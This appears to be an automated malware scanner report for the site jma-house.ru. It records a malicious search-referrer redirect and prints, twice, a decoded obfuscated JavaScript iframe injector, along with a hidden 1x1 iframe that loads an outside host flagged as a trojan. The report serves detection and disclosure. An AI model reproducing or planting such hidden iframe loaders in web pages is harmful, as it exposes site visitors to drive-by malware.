Malware Scanner report for jma-house.ru

Malicious/Suspicious/Total urls checked
2/0/4
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://spyware-files.info/0/go.php?sid=2
39 websites infected.

The website "jma-house.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/2/2
2 suspicious iframes found. See details below
Deface / Content modification
OK

Malicious/Suspicious Redirects

Request / Server response / Status

URL: http://jma-house.ru/
(imitation of visitor from search engine)

Request:
GET / HTTP/1.1
Host: jma-house.ru
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Connection: close
Date: Wed, 10 Sep 2014 21:21:24 GMT
Location: http://spyware-files.info/0/go.php?sid=2
Server: Apache
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1

Status: malicious

Scanned pages/files

Request / Server response / Status
http://jma-house.ru/
200 OK
Content-Length: 6869
Content-Type: text/html
clean
http://jma-house.ru/templates/jma-house/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 8029
Content-Type: application/x-javascript
clean
http://jma-house.ru/../../Scripts/AC_RunActiveContent.js
400 Bad Request
Content-Length: 2862
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Decoded script:


<b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b>
document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>');

Antivirus reports:

Avast
HTML:Iframe-EX [Trj]

Hidden iFrame found.
size: 1x1     
src: http://glondis.cn/in.cgi?4

<iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" />

http://jma-house.ru/test404page.js
404 Not Found
Content-Length: 2806
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Decoded script:


<b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b>
document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>');

Antivirus reports:

Avast
HTML:Iframe-EX [Trj]

Hidden iFrame found.
size: 1x1     
src: http://glondis.cn/in.cgi?4

<iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" />

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jma-house.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jma-house.ru/

Result: jma-house.ru is not infected or malware details are not published yet.